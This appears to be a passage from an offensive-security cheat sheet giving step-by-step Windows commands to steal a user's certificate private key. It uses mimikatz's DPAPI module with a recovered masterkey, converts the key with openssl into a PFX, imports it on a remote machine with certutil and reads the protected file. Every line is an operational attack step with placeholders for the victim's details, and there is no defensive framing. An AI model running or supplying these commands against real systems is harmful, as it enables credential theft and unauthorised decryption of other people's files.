gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE>\
.\mimikatz.exe "dpapi::capi /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE\<FILE> /masterkey:<SHA-1>" "exit"
## Download the *.pvk file to your machine.
## ------------------| Building & Installing the correct PFX
openssl x509 -inform DER -outform PEM -in *.der -out public.pem
openssl rsa -inform PVK -outform PEM -in *.pvk -out private.pem
openssl pkcs12 -in public.pem -inkey private.pem -password pass:<NewPassword> -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
## Copy the cert.pfx file to remote machine.
certutil -user -p <NewPassword> -importpfx cert.pfx NoChain,NoRoot
## ------------------| Data access
type "c:\users\file.txt"
Last updated